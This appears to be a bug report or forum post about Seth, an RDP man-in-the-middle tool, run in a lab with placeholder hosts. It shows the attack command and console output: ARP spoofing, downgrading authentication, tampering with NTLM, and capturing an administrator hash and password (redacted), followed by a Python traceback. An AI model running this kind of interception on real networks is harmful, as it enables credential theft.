Description
Scenario Lab:
- Victim - Windows 11 23H2 - VICTIM_IP
- Attacking-PC - Kali Linux - ATTACKER_IP
- Target - DC01 - Windows Server 2019 - TARGET_IP - Gateway -GATEWAY_IP
When I ran the following command '$ ./seth.sh INTERFACE ATTACKER_IP VICTIM_IP GATEWAY_IP> TARGET_IP' I got the following error:
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is TARGET_IP
[] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from VICTIM_IP:55727
Warning: RC4 not available on client, attack might not work
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
administrator::rdp:NTML hash
Tamper with NTLM response
Downgrading CredSSP
Connection received from VICTIM_IP:55728
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/home/kali/Documents/Seth-master/seth/main.py", line 49, in run
self.run_fake_server()
File "/home/kali/Documents/Seth-master/seth/main.py", line 79, in run_fake_server
self.lsock.send(resp)
File "/usr/lib/python3.11/ssl.py", line 1242, in send
return self._sslobj.write(data)
^^^^^^^^^^^^^^^^^^^^^^^^
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:2427)
Connection received from VICTIM_IP:55731
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
rdp\administrator:<shows_password>
[] Cleaning up...
[] Done
Can you check this?
This tool is pure to verify RDP security settings on my own network.
Also Server does not enforces NLA